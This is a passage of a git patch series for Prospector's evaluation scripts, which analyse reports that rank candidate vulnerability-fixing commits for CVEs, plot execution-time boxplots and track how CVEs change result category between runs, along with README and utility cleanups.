except FileNotFoundError: -# continue - -# df = pd.DataFrame(data) - -# sns.boxplot(x="set", y="core_execution_time", data=df) -# plt.title("Overall Execution Time Comparison") -# plt.xlabel("Report Set") -# plt.ylabel("Execution Time (s)") - -# plt.show() +def overall_execution_time(input_file: str): + """Create a boxplot to compare the overall execution time across four + categories of reports.""" + data = [] + + file = f"{INPUT_DATA_PATH}{input_file}.csv" + dataset = load_dataset(file) + dataset = dataset[:100] + + directories = { + "without LLM NVI": "evaluation/data/reports_without_llm", + "with LLM NVI": "evaluation/data/reports_with_llm", + "without LLM MVI": "evaluation/data/reports_without_llm_mvi", + "with LLM MVI": "evaluation/data/reports_with_llm_mvi", + } + + for batch, path in directories.items(): + for record in dataset: + try: + with open(f"{path}/{record[0]}.json", "r") as file: + report = json.load(file) + core_execution_time = report["processing_statistics"][ + "core" + ]["execution time"][0] + data.append( + { + "set": batch, + "core_execution_time": core_execution_time, + } + ) + except FileNotFoundError: + continue + + df = pd.DataFrame(data) + + sns.boxplot(x="set", y="core_execution_time", data=df) + plt.title("Overall Execution Time Comparison") + plt.xlabel("Report Set") + plt.ylabel("Execution Time (s)") + + plt.savefig(f"{ANALYSIS_RESULTS_PATH}plots/boxplot-execution-time.png") diff --git a/prospector/evaluation/main.py b/prospector/evaluation/main.py index fe8366ee6..b78ca2c92 100644 --- a/prospector/evaluation/main.py +++ b/prospector/evaluation/main.py @@ -8,7 +8,10 @@ analyse_prospector_reports, count_existing_reports, ) -from evaluation.analyse_statistics import analyse_statistics +from evaluation.analyse_statistics import ( + analyse_statistics, + overall_execution_time, +) from evaluation.dispatch_jobs import ( dispatch_prospector_jobs, empty_queue, @@ -86,14 +89,13 @@ def main(argv): dispatch_prospector_jobs(args.input, args.cve) # analysis of Prospector reports - elif ( - args.analyze and not args.rules and not args.execute and not args.stats - ): + elif args.analyze and not args.execute and not args.stats: analyse_prospector_reports(args.input) # analysis of execution statistics in report - elif args.analyze and args.stats and not args.rules and not args.execute: - analyse_statistics(args.input) + elif args.analyze and args.stats and not args.execute: + # analyse_statistics(args.input) + overall_execution_time(args.input) # Remove all jobs from the queue elif args.empty_queue and not args.execute and not args.stats: From 1a0952588d5223ff22904f6f3eceae74825f7794 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 5 Aug 2024 15:11:01 +0000 Subject: [PATCH 086/130] adds function to analyse which reports change category in different executions --- prospector/evaluation/analyse.py | 169 ++++++++++++++++++++++++------- prospector/evaluation/main.py | 26 +++-- 2 files changed, 151 insertions(+), 44 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 429e02539..3810c3a46 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -1,3 +1,5 @@ +from collections import defaultdict +from datetime import datetime import json import os from typing import List @@ -5,7 +7,11 @@ from tqdm import tqdm from evaluation.utils import ( + COMPARE_DIRECTORY_1, + COMPARE_DIRECTORY_2, load_dataset, + load_json_file, + save_dict_to_json, update_summary_execution_table, logger, INPUT_DATA_PATH, @@ -14,21 +20,21 @@ ) -STRONG_RULES = [ - "COMMIT_IN_REFERENCE", - "VULN_ID_IN_MESSAGE", - "XREF_BUG", - "XREF_GH", - "VULN_ID_IN_LINKED_ISSUE", -] -# Analyse old reports before rule names changed # STRONG_RULES = [ # "COMMIT_IN_REFERENCE", -# "CVE_ID_IN_MESSAGE", -# "CROSS_REFERENCED_JIRA_LINK", -# "CROSS_REFERENCED_GH_LINK", -# "CVE_ID_IN_LINKED_ISSUE", +# "VULN_ID_IN_MESSAGE", +# "XREF_BUG", +# "XREF_GH", +# "VULN_ID_IN_LINKED_ISSUE", # ] +# Analyse old reports before rule names changed +STRONG_RULES = [ + "COMMIT_IN_REFERENCE", + "CVE_ID_IN_MESSAGE", + "CROSS_REFERENCED_JIRA_LINK", + "CROSS_REFERENCED_GH_LINK", + "CVE_ID_IN_LINKED_ISSUE", +] WEAK_RULES = [ "CHANGES_RELEVANT_FILES", @@ -73,19 +79,19 @@ def analyse_prospector_reports(filename: str): "false_positive": [], } # Analyse old reports before rule names changed - # results = { - # "high": [], - # "COMMIT_IN_REFERENCE": [], - # "CVE_ID_IN_MESSAGE": [], - # "CVE_ID_IN_LINKED_ISSUE": [], - # "CROSS_REFERENCED_JIRA_LINK": [], - # "CROSS_REFERENCED_GH_LINK": [], - # "medium": [], - # "low": [], - # "not_found": [], - # "not_reported": [], - # "false_positive": [], - # } + results = { + "high": [], + "COMMIT_IN_REFERENCE": [], + "CVE_ID_IN_MESSAGE": [], + "CVE_ID_IN_LINKED_ISSUE": [], + "CROSS_REFERENCED_JIRA_LINK": [], + "CROSS_REFERENCED_GH_LINK": [], + "medium": [], + "low": [], + "not_found": [], + "not_reported": [], + "false_positive": [], + } print(f"Analysing reports in {PROSPECTOR_REPORT_PATH}") logger.info(f"Attempting to analyse {len(dataset)} CVEs.") @@ -120,11 +126,11 @@ def analyse_prospector_reports(filename: str): table_data = [] # Combine the two Cross Reference rules into one count - results["XREF_BUG"] += results["XREF_GH"] - results.pop("XREF_GH") + # results["XREF_BUG"] += results["XREF_GH"] + # results.pop("XREF_GH") # Analyse old reports before rule names changed - # results["CROSS_REFERENCED_JIRA_LINK"] += results["CROSS_REFERENCED_GH_LINK"] - # results.pop("CROSS_REFERENCED_GH_LINK") + results["CROSS_REFERENCED_JIRA_LINK"] += results["CROSS_REFERENCED_GH_LINK"] + results.pop("CROSS_REFERENCED_GH_LINK") logger.info(f"Ran analysis on {PROSPECTOR_REPORT_PATH}.") @@ -138,20 +144,32 @@ def analyse_prospector_reports(filename: str): mode="MVI", data=table_data, total=str(analysed_reports_count), - filepath=f"{ANALYSIS_RESULTS_PATH}summary_execution_results.tex", + filepath=f"{ANALYSIS_RESULTS_PATH}summary_execution/table.tex", ) logger.info( f"Analysed {analysed_reports_count}, couldn't find reports for {len(reports_not_found)} out of {attempted_count} analysis attempts." ) - logger.debug(f"Strong rules matching: {results['high']}") - logger.debug( - f"CVEs matching Commit in reference: {[item[0] for item in results['high'] if item[1] == 'COMMIT_IN_REFERENCE']}" + + # Save detailed results in a json file (instead of cluttering logs) + batch_name = os.path.basename(os.path.normpath(PROSPECTOR_REPORT_PATH)) + detailed_results_output_path = ( + f"{ANALYSIS_RESULTS_PATH}summary_execution/{batch_name}.json" ) - logger.debug(f"Weak rules matching: {results['medium']}") + printout = { + "timestamp": datetime.now().strftime("%d-%m-%Y, %H:%M"), + "results": results, + "missing": reports_not_found, + } + try: + with open(detailed_results_output_path, "r") as f: + existing_data = json.load(f) + except (FileNotFoundError, json.JSONDecodeError): + existing_data = {"summary_execution_details": []} + + existing_data["summary_execution_details"].append(printout) - logger.debug(f"False positive reports: {results['false_positive']}") - logger.debug(f"Not found reports: {results['not_found']}") + save_dict_to_json(existing_data, detailed_results_output_path) def _analyse_report( @@ -289,3 +307,82 @@ def count_existing_reports(data_filepath): print( f"There are {len(dataset) - len(missing_reports)} reports. Reports are missing for {len(missing_reports)} CVEs: {missing_reports}" ) + + +def analyse_category_flows(): + """Analyse which CVEs changed category in different executions.""" + data1 = load_json_file(COMPARE_DIRECTORY_1) + data2 = load_json_file(COMPARE_DIRECTORY_2) + + transitions = defaultdict(lambda: defaultdict(list)) + + results1 = _create_cve_to_category_mapping( + data1["summary_execution_details"][-1]["results"] + ) + results2 = _create_cve_to_category_mapping( + data2["summary_execution_details"][-1]["results"] + ) + + for cve, category in results1.items(): + new_category = results2.get(cve, None) + if not new_category: + print(f"No report for {cve} in second batch.") + continue + + if results2.get(cve, "") != category: + transitions[category][new_category].append(cve) + + save_dict_to_json( + transitions, + f"{ANALYSIS_RESULTS_PATH}summary_execution/flow-analysis.json", + ) + + # Create a sankey diagram + # source = transitions.keys() + # _create_sankey_diagram(source, target, value) + + +def _create_cve_to_category_mapping(results: dict) -> dict: + res = {} + for category in results.keys(): + for cve in results[category]: + res[cve] = category + + return res + + +# Create Sankey Diagram to see how the reports change category +def _create_sankey_diagram(source: list, target: list, value: list): + """Creates a sankey diagram between two files containing summary execution + details, ie. a json file with a `results` field containing: + - high + - commit in reference + - vuln id in message + - vuln id in linked issue + - xref bug + - medium + - low + - not_found + - not_reported + - false_positive + + Attention: Not finished! + """ + data = load_json_file( + f"{ANALYSIS_RESULTS_PATH}summary_execution/{filename1}.json" + ) + details = data.get("summary_execution_details", []) + results = details[-1].get("results", {}) + + # Initialize a dictionary to hold transitions + transitions = defaultdict(lambda: defaultdict(int)) + + # Create a list of categories and CVEs + cve_categories = [ + (category, cve) for category, cves in results.items() for cve in cves + ] + for i, (cat1, cve1) in enumerate(cve_categories): + for cat2, cve2 in cve_categories[i + 1 :]: + if cve1 == cve2: + transitions[cat1][cat2] += 1 + print(transitions) diff --git a/prospector/evaluation/main.py b/prospector/evaluation/main.py index b78ca2c92..075075525 100644 --- a/prospector/evaluation/main.py +++ b/prospector/evaluation/main.py @@ -5,6 +5,7 @@ import sys from evaluation.analyse import ( + analyse_category_flows, analyse_prospector_reports, count_existing_reports, ) @@ -78,6 +79,13 @@ def parse_cli_args(args): action="store_true", ) + parser.add_argument( + "-sa", + "--sankey", + help="Create a Sankey Diagram with detailed summary execution JSON files.", + action="store_true", + ) + return parser.parse_args() @@ -88,14 +96,16 @@ def main(argv): if args.execute and not args.analyze: dispatch_prospector_jobs(args.input, args.cve) - # analysis of Prospector reports - elif args.analyze and not args.execute and not args.stats: - analyse_prospector_reports(args.input) - - # analysis of execution statistics in report - elif args.analyze and args.stats and not args.execute: - # analyse_statistics(args.input) - overall_execution_time(args.input) + elif args.analyze and not args.execute: + # analysis of execution statistics in report + if args.stats: + # analyse_statistics(args.input) + overall_execution_time(args.input) + elif args.sankey: + analyse_category_flows() + # analysis of Prospector reports + else: + analyse_prospector_reports(args.input) # Remove all jobs from the queue elif args.empty_queue and not args.execute and not args.stats: From 60ed59c61f4865fbaa13fcc2282306db18aa7c43 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 5 Aug 2024 15:11:27 +0000 Subject: [PATCH 087/130] [DOC] updates readme --- prospector/evaluation/README.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/prospector/evaluation/README.md b/prospector/evaluation/README.md index 934efce1d..036b7ecc8 100644 --- a/prospector/evaluation/README.md +++ b/prospector/evaluation/README.md @@ -18,7 +18,9 @@ b219fd6219ed adminer "entrypoint.sh php -…" 47 minutes ago 7c540450ab76 redis:alpine "docker-entrypoint.s…" 47 minutes ago Up 47 minutes 0.0.0.0:6379->6379/tcp, :::6379->6379/tcp prospector_redis_1 ``` -[`dispatch_jobs.py`](#running-prospector-on-multiple-cves-dispatch_jobspy) creates jobs with the `prospector()` function in them and enqueues them in a Redis Queue, from which the `prospector_worker` container fetches jobs and executes them. To visualise what is going on, run `docker attach prospector_worker_1` to see the usual console output. In order to change something inside the container, run `docker exec -it prospector_worker_1 bash` to open an interactive bash shell. +[`dispatch_jobs.py`](#running-prospector-on-multiple-cves-dispatch_jobspy) creates jobs with the `prospector()` function in them and enqueues +them in a Redis Queue, from which the `prospector_worker` container fetches jobs and executes them. To visualise what is going on, run +`docker attach prospector_worker_1` to see the usual console output. In order to change something inside the container, run `docker exec -it prospector_worker_1 bash` to open an interactive bash shell. ## Command Line Options @@ -38,7 +40,7 @@ The configuration file has two parts to it: a main part and a Prospector setting The main part at the top allows you to set the path to where the input data can be found, where Prospector reports should be saved to and where analysis results should be saved to. -The Prospector part allows you to set the settings for Prospector (independent from the Prospector settings used when running Prospector with `./run_prospector`). **Watch out**: Since the `prospector_worker` container is created in the beginning with the current state of the `config.yaml`, simply saving any changes in `config.yaml` and dispatching new jobs will still run them with the old configuration. For new configuration parameters to take effect, destroy the containers with `make docker-clean` and rebuild them with `make docker-setup`. +The Prospector part allows you to set the settings for Prospector (independent from the Prospector settings used when running Prospector with `./run_prospector`). **Watch out**: Since the `prospector_worker` container is created in the beginning with the current state of the `config.yaml`, simply saving any changes in `config.yaml` and dispatching new jobs will still run them with the old configuration. For new configuration parameters to take effect, either destroy the containers with `make docker-clean` and rebuild them with `make docker-setup` or open an interactive shell to the container and make your changes to `config.yaml` in there. ## Script Files explained From 62dcee1e4c24a29f43f955aaaf3f162de503ec79 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 5 Aug 2024 15:11:53 +0000 Subject: [PATCH 088/130] [DOC] cleans up utils file --- prospector/evaluation/utils.py | 97 +++------------------------------- 1 file changed, 6 insertions(+), 91 deletions(-) diff --git a/prospector/evaluation/utils.py b/prospector/evaluation/utils.py index e5fcaf816..43d206ee8 100644 --- a/prospector/evaluation/utils.py +++ b/prospector/evaluation/utils.py @@ -1,10 +1,7 @@ import csv import json -import re from omegaconf import OmegaConf -from datamodel.advisory import build_advisory_record -from urllib.parse import urlparse from log.logger import create_logger config = OmegaConf.load("evaluation/config.yaml") @@ -16,20 +13,9 @@ # Select the folder depending whether LLMs are used or not PROSPECTOR_REPORT_PATH = config.prospector_reports_path ANALYSIS_RESULTS_PATH = config.analysis_results_path - -VULN = ["version", "through", "versions"] - -FIXED = [ - "before", - "before release", - "before version", - "prior to", - "upgrade to", - "fixed in", - "fixed in version", - "fixed in release", - "to version", -] +# Comparison dirs +COMPARE_DIRECTORY_1 = config.compare_directory1 +COMPARE_DIRECTORY_2 = config.compare_directory2 def load_dataset(path: str): @@ -45,72 +31,9 @@ def load_json_file(path: str) -> dict: return json.load(f) -def is_real_version(text: str): - return bool(re.match(r"\d+\.(?:\d+\.*)*\d", text)) - - -def get_version_spacy(text: str, nlp): - """This function extracts vulnerable and fixed version numbers from a given text using spaCy.""" - doc = nlp(text) - # relevant_sentences = {} - # relevant_sentence = "" - fixed_version = "" - vulnerable_version = "" - for i in range(len(doc))[1:]: - if is_real_version(doc[i].text): - if doc[i - 1].text in FIXED: - # relevant_sentence = doc[: i + 1] - fixed_version = doc[i].text - elif (doc[i - 2].text + " " + doc[i - 1].text) in FIXED: - # relevant_sentence = doc[: i + 1] - fixed_version = doc[i].text - elif ( - doc[i - 3].text + " " + doc[i - 2].text + " " + doc[i - 1].text - ) in FIXED: - # relevant_sentence = doc[: i + 1] - fixed_version = doc[i].text - else: - # relevant_sentence = doc[: i + 1] - vulnerable_version = doc[i].text - return vulnerable_version, fixed_version - - -def check_advisory(cve, repository=None, nlp=None): - """This function checks the advisory for a given CVE and attempts to extract version information.""" - advisory = build_advisory_record( - cve, nvd_rest_endpoint="http://localhost:8000/nvd/vulnerabilities/" - ) - references = [urlparse(r).netloc for r in advisory.references] - return references - vuln = "None" - if len(advisory.versions.get("affected")): - vuln = advisory.versions.get("affected")[-1] - - fixed = "None" - if len(advisory.versions.get("fixed")): - fixed = advisory.versions.get("fixed")[-1] - - vuln2, fixed2 = get_version_spacy(advisory.description, nlp) - res = [advisory.cve_id, advisory.description] - if fixed == fixed2 and vuln == vuln2: - res.append(f"{vuln}:{fixed}") - if fixed == "None" and fixed2 != "": - res.append(f"{vuln}:{fixed2}") - if vuln == "None" and vuln2 != "": - res.append(f"{vuln2}:{fixed}") - if fixed != fixed2 and fixed2 != "" and fixed != "None": - res.append(f"{vuln}:{fixed}") - res.append(f"{vuln}:{fixed2}") - - if len(res) > 2: - res.append("***************************************") - print(advisory.cve_id) - return res - else: - res.append(f"{vuln}:{fixed}") - res.append("***************************************") - print(advisory.cve_id) - return res +def save_dict_to_json(dictionary: dict, path: str): + with open(path, "w") as file: + return json.dump(dictionary, file, indent=4) def update_summary_execution_table( @@ -168,11 +91,3 @@ def update_summary_execution_table( file.writelines(table_lines) print(f"Updated latex table at {filepath}") - - -def update_false_positives(itm): - with open(f"{ANALYSIS_RESULTS_PATH}false_postive.txt", "a") as file: - writer = csv.writer(file) - writer.writerow( - [f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}"] - ) From 2f2540e52a31deef9290e71c40077094494fac3c Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 5 Aug 2024 16:41:34 +0000 Subject: [PATCH 089/130] [ADD] adds function to plot commit classification times as boxplots --- prospector/evaluation/analyse_statistics.py | 77 +++++++++++++++++++++ prospector/evaluation/main.py | 4 +- prospector/evaluation/utils.py | 9 ++- 3 files changed, 87 insertions(+), 3 deletions(-) diff --git a/prospector/evaluation/analyse_statistics.py b/prospector/evaluation/analyse_statistics.py index 27ce0baa2..8d2cf4976 100644 --- a/prospector/evaluation/analyse_statistics.py +++ b/prospector/evaluation/analyse_statistics.py @@ -9,6 +9,7 @@ INPUT_DATA_PATH, PROSPECTOR_REPORT_PATH, load_dataset, + load_json_file, ) @@ -189,3 +190,79 @@ def overall_execution_time(input_file: str): plt.ylabel("Execution Time (s)") plt.savefig(f"{ANALYSIS_RESULTS_PATH}plots/boxplot-execution-time.png") + + +def commit_classification_time(input_file: str): + """Create a boxplot to compare the time used for commit classification + across both categories of reports with LLM usage.""" + data = [] + + file = f"{INPUT_DATA_PATH}{input_file}.csv" + dataset = load_dataset(file) + dataset = dataset[:100] + + directories = { + "NVI": "evaluation/data/reports_with_llm", + "MVI": "evaluation/data/reports_with_llm_mvi", + } + + for batch, path in directories.items(): + for record in dataset: + try: + report = load_json_file(f"{path}/{record[0]}.json") + if ( + "commit_classification" + not in report["processing_statistics"]["LLM"] + ): + print(f"No cc stats for {path}/{record[0]}.json") + continue + cc_times = report["processing_statistics"]["LLM"][ + "commit_classification" + ]["execution time"] + data.append( + { + "set": batch, + "core_execution_time": sum(cc_times), + } + ) + except FileNotFoundError: + continue + + df = pd.DataFrame(data) + + # Create the plot + plt.figure(figsize=(10, 6)) + + # Create boxplot with logarithmic scale + sns.boxplot(x="set", y="core_execution_time", data=df, showfliers=False) + + # Add individual points + sns.stripplot( + x="set", + y="core_execution_time", + data=df, + color=".3", + size=4, + jitter=True, + alpha=0.5, + ) + + # Set logarithmic scale for y-axis + plt.yscale("log") + + # Customize the plot + plt.title("Overall Execution Time Comparison (Log Scale)") + plt.xlabel("Report Set") + plt.ylabel("Execution Time (s)") + + # Add grid for better readability + plt.grid(True, which="both", ls="-", alpha=0.2) + + # Tight layout to prevent cutting off labels + plt.tight_layout() + + # Save the figure + plt.savefig( + f"{ANALYSIS_RESULTS_PATH}plots/commit-classification-time.png", dpi=300 + ) + plt.close() diff --git a/prospector/evaluation/main.py b/prospector/evaluation/main.py index 075075525..1e452b0a1 100644 --- a/prospector/evaluation/main.py +++ b/prospector/evaluation/main.py @@ -11,6 +11,7 @@ ) from evaluation.analyse_statistics import ( analyse_statistics, + commit_classification_time, overall_execution_time, ) from evaluation.dispatch_jobs import ( @@ -100,7 +101,8 @@ def main(argv): # analysis of execution statistics in report if args.stats: # analyse_statistics(args.input) - overall_execution_time(args.input) + # overall_execution_time(args.input) + commit_classification_time(args.input) elif args.sankey: analyse_category_flows() # analysis of Prospector reports diff --git a/prospector/evaluation/utils.py b/prospector/evaluation/utils.py index 43d206ee8..c9fbad73a 100644 --- a/prospector/evaluation/utils.py +++ b/prospector/evaluation/utils.py @@ -27,8 +27,13 @@ def load_dataset(path: str): def load_json_file(path: str) -> dict: - with open(path, "r") as f: - return json.load(f) + try: + with open(path, "r") as f: + return json.load(f) + except FileNotFoundError: + raise + except Exception: + raise def save_dict_to_json(dictionary: dict, path: str): From 6deb2e5b16122e037275639d1e7211ce7cbd2f1e Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 7 Aug 2024 08:41:27 +0000 Subject: [PATCH 090/130] [ADD] function to check whether two ground truth datasets contain the same CVEs --- prospector/evaluation/analyse.py | 304 +++++++++++++++++++------------ prospector/evaluation/main.py | 24 ++- 2 files changed, 206 insertions(+), 122 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 3810c3a46..aa9ffa06e 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -1,4 +1,5 @@ from collections import defaultdict +import csv from datetime import datetime import json import os @@ -19,22 +20,41 @@ ANALYSIS_RESULTS_PATH, ) +# The number of top commits to consider for 'high confidence' classification +NUM_TOP_COMMITS = 10 + +cc_rule_as_strong_rule = True +# Whether to use the old rule names (old: COMMIT_IN_REFERENCE, +# CVE_ID_IN_MESSAGE, CVE_ID_IN_LINKED_ISSUE, CROSS_REFERENCED_JIRA_LINK, +# CROSS_REFERENCED_GH_LINK) +use_old_rule_names = True if "matteo" in PROSPECTOR_REPORT_PATH else False -# STRONG_RULES = [ -# "COMMIT_IN_REFERENCE", -# "VULN_ID_IN_MESSAGE", -# "XREF_BUG", -# "XREF_GH", -# "VULN_ID_IN_LINKED_ISSUE", -# ] -# Analyse old reports before rule names changed -STRONG_RULES = [ - "COMMIT_IN_REFERENCE", - "CVE_ID_IN_MESSAGE", - "CROSS_REFERENCED_JIRA_LINK", - "CROSS_REFERENCED_GH_LINK", - "CVE_ID_IN_LINKED_ISSUE", -] + +if cc_rule_as_strong_rule and not use_old_rule_names: + STRONG_RULES = [ + "COMMIT_IN_REFERENCE", + "VULN_ID_IN_MESSAGE", + "XREF_BUG", + "XREF_GH", + "VULN_ID_IN_LINKED_ISSUE", + "COMMIT_IS_SECURITY_RELEVANT", + ] +elif use_old_rule_names: + STRONG_RULES = [ + "COMMIT_IN_REFERENCE", + "CVE_ID_IN_MESSAGE", + "CROSS_REFERENCED_JIRA_LINK", + "CROSS_REFERENCED_GH_LINK", + "CVE_ID_IN_LINKED_ISSUE", + ] +else: + STRONG_RULES = [ + "COMMIT_IN_REFERENCE", + "VULN_ID_IN_MESSAGE", + "XREF_BUG", + "XREF_GH", + "VULN_ID_IN_LINKED_ISSUE", + ] WEAK_RULES = [ "CHANGES_RELEVANT_FILES", @@ -55,7 +75,8 @@ def analyse_prospector_reports(filename: str): """Analyses Prospector reports. Creates the summary_execution_results table.""" file = INPUT_DATA_PATH + filename + ".csv" dataset = load_dataset(file) - # dataset = dataset[746:747] # Actual line number in D53.csv -2 + # dataset = dataset[:100] # Actual line number in D53.csv -2 + # dataset = dataset[198:199] # Actual line number in D53.csv -2 # Keep track of how many reports were attempted to be analysed attempted_count = 0 @@ -65,33 +86,35 @@ def analyse_prospector_reports(filename: str): reports_not_found = [] #### Data to insert into table - results = { - "high": [], - "COMMIT_IN_REFERENCE": [], - "VULN_ID_IN_MESSAGE": [], - "VULN_ID_IN_LINKED_ISSUE": [], - "XREF_BUG": [], - "XREF_GH": [], - "medium": [], - "low": [], - "not_found": [], - "not_reported": [], - "false_positive": [], - } - # Analyse old reports before rule names changed - results = { - "high": [], - "COMMIT_IN_REFERENCE": [], - "CVE_ID_IN_MESSAGE": [], - "CVE_ID_IN_LINKED_ISSUE": [], - "CROSS_REFERENCED_JIRA_LINK": [], - "CROSS_REFERENCED_GH_LINK": [], - "medium": [], - "low": [], - "not_found": [], - "not_reported": [], - "false_positive": [], - } + if use_old_rule_names: + results = { + "high": [], + "COMMIT_IN_REFERENCE": [], + "CVE_ID_IN_MESSAGE": [], + "CVE_ID_IN_LINKED_ISSUE": [], + "CROSS_REFERENCED_JIRA_LINK": [], + "CROSS_REFERENCED_GH_LINK": [], + "medium": [], + "low": [], + "not_found": [], + "not_reported": [], + "false_positive": [], + } + else: + results = { + "high": [], + "COMMIT_IN_REFERENCE": [], + "VULN_ID_IN_MESSAGE": [], + "VULN_ID_IN_LINKED_ISSUE": [], + "XREF_BUG": [], + "XREF_GH": [], + "COMMIT_IS_SECURITY_RELEVANT": [], + "medium": [], + "low": [], + "not_found": [], + "not_reported": [], + "false_positive": [], + } print(f"Analysing reports in {PROSPECTOR_REPORT_PATH}") logger.info(f"Attempting to analyse {len(dataset)} CVEs.") @@ -126,11 +149,21 @@ def analyse_prospector_reports(filename: str): table_data = [] # Combine the two Cross Reference rules into one count - # results["XREF_BUG"] += results["XREF_GH"] - # results.pop("XREF_GH") - # Analyse old reports before rule names changed - results["CROSS_REFERENCED_JIRA_LINK"] += results["CROSS_REFERENCED_GH_LINK"] - results.pop("CROSS_REFERENCED_GH_LINK") + if use_old_rule_names: + results["CROSS_REFERENCED_JIRA_LINK"] += results[ + "CROSS_REFERENCED_GH_LINK" + ] + results.pop("CROSS_REFERENCED_GH_LINK") + # Remove the cc rule count before writing to the table as the table doesn't include it + else: + if cc_rule_as_strong_rule: + logger.info( + f"CC Rule matched for {len(results['COMMIT_IS_SECURITY_RELEVANT'])}: {results['COMMIT_IS_SECURITY_RELEVANT']}" + ) + results.pop("COMMIT_IS_SECURITY_RELEVANT") + + results["XREF_BUG"] += results["XREF_GH"] + results.pop("XREF_GH") logger.info(f"Ran analysis on {PROSPECTOR_REPORT_PATH}.") @@ -140,6 +173,7 @@ def analyse_prospector_reports(filename: str): logger.info(f"\t{v}\t{key}") table_data.append([v, round(v / analysed_reports_count * 100, 2)]) + # Generate the Latex table update_summary_execution_table( mode="MVI", data=table_data, @@ -152,29 +186,12 @@ def analyse_prospector_reports(filename: str): ) # Save detailed results in a json file (instead of cluttering logs) - batch_name = os.path.basename(os.path.normpath(PROSPECTOR_REPORT_PATH)) - detailed_results_output_path = ( - f"{ANALYSIS_RESULTS_PATH}summary_execution/{batch_name}.json" - ) - printout = { - "timestamp": datetime.now().strftime("%d-%m-%Y, %H:%M"), - "results": results, - "missing": reports_not_found, - } - try: - with open(detailed_results_output_path, "r") as f: - existing_data = json.load(f) - except (FileNotFoundError, json.JSONDecodeError): - existing_data = {"summary_execution_details": []} - - existing_data["summary_execution_details"].append(printout) - - save_dict_to_json(existing_data, detailed_results_output_path) + _save_summary_execution_details(results, reports_not_found) def _analyse_report( results: dict, cve_id: str, report_data, true_fixing_commits: list -) -> dict: +): """Analyzes a single Prospector report for a given CVE and updates the results dictionary. @@ -192,18 +209,11 @@ def _analyse_report( fixing_commits=true_fixing_commits, ) - # Fixing commit is not among the candidates of the report if len(true_fixing_commits_in_report) == 0: - # check if there are any candidates at all - ranked_candidates = report_data["commits"] - if not ranked_candidates: - logger.info(f"Report for {cve_id} does not contain any commits.") - # else the report does not contain the fixing commit at all - else: - logger.debug( - f"Report for {cve_id} does not contain fixing commit at all." - ) - # Check if it's a false positive + # If there are no candidates at all -> not reported + existing_candidates = report_data["commits"] + if existing_candidates: + # check if it's a false positive (it matched a strong rule) strong_matched_rules = [ rule["id"] for rule in report_data["commits"][0]["matched_rules"] @@ -211,45 +221,49 @@ def _analyse_report( ] if strong_matched_rules: results["false_positive"].append(cve_id) - return results - + return + # otherwise, there are no candidates or it's not a false positive results["not_reported"].append(cve_id) - return results - - #### Find the confidence & count strong rules - for i, commit in enumerate(report_data["commits"]): - # Get candidate id and also twins ids - candidate_and_twins = _get_candidate_and_twins_ids(commit) - candidates_in_fixing_commits = _list_intersection( - candidate_and_twins, true_fixing_commits - ) - - # First candidate is one of the fixing commits - if i == 0 and candidates_in_fixing_commits: - matched_rules = {rule["id"] for rule in commit["matched_rules"]} - - # check for strong rules - for rule in STRONG_RULES: - if rule in matched_rules: - results[rule].append(cve_id) - results["high"].append(cve_id) - return results - - # check for weak rules - weak_matched_rules = matched_rules.intersection(WEAK_RULES) - if weak_matched_rules: - results["medium"].append(cve_id) - return results - - # Fixing commit among the first 10 (low confidence) - if i > 0 and i < 10 and candidates_in_fixing_commits: - results["low"].append(cve_id) - return results - - # Commit not among the first 10 (not found) - if i >= 10: - results["not_found"].append(cve_id) - return results + return + + # Fixing commit is among the candidates of the report + if len(true_fixing_commits_in_report) >= 0: + for i, commit in enumerate(report_data["commits"]): + # Get candidates and twins that are fixing commits + candidate_and_twins = _get_candidate_and_twins_ids(commit) + candidates_in_fixing_commits = _list_intersection( + candidate_and_twins, true_fixing_commits + ) + + # First candidate is one of the fixing commits + if i <= NUM_TOP_COMMITS and candidates_in_fixing_commits: + matched_rules = [rule["id"] for rule in commit["matched_rules"]] + + # check for strong rules + for rule in STRONG_RULES: + if rule in matched_rules: + results[rule].append(cve_id) + results["high"].append(cve_id) + return + + if i <= 0 and candidates_in_fixing_commits: + # check for weak rules + weak_matched_rules = set(matched_rules).intersection(WEAK_RULES) + if weak_matched_rules: + results["medium"].append(cve_id) + return + + # Fixing commit among the first 10 (low confidence) + if i > 0 and i < 10 and candidates_in_fixing_commits: + results["low"].append(cve_id) + return + + # Commit not among the first 10 (not found) + if i >= 10: + results["not_found"].append(cve_id) + return + + logger.info(f"This shouldn't happen {cve_id}") def _get_true_fixing_commits_in_report( @@ -287,6 +301,29 @@ def _list_intersection(list1, list2): return list(set(list1) & set(list2)) +def _save_summary_execution_details(results: dict, reports_not_found: list): + """Saves the detailed content (including the list of CVEs for each category + of the summary execution table to a JSON file.""" + batch_name = os.path.basename(os.path.normpath(PROSPECTOR_REPORT_PATH)) + detailed_results_output_path = ( + f"{ANALYSIS_RESULTS_PATH}summary_execution/{batch_name}.json" + ) + printout = { + "timestamp": datetime.now().strftime("%d-%m-%Y, %H:%M"), + "results": results, + "missing": reports_not_found, + } + try: + with open(detailed_results_output_path, "r") as f: + existing_data = json.load(f) + except (FileNotFoundError, json.JSONDecodeError): + existing_data = {"summary_execution_details": []} + + existing_data["summary_execution_details"].append(printout) + + save_dict_to_json(existing_data, detailed_results_output_path) + + def count_existing_reports(data_filepath): """Prints which CVEs reports are missing for to the console.""" file = INPUT_DATA_PATH + data_filepath + ".csv" @@ -310,7 +347,14 @@ def count_existing_reports(data_filepath): def analyse_category_flows(): - """Analyse which CVEs changed category in different executions.""" + """Analyse which CVEs changed category in different executions given two + JSON files with the detailed summary execution results. + + The detailed summary execution results are created when executing + `analyse_prospector_reports`. + + Saves the output to `summary_execution/flow-analysis.json`. + """ data1 = load_json_file(COMPARE_DIRECTORY_1) data2 = load_json_file(COMPARE_DIRECTORY_2) @@ -386,3 +430,29 @@ def _create_sankey_diagram(source: list, target: 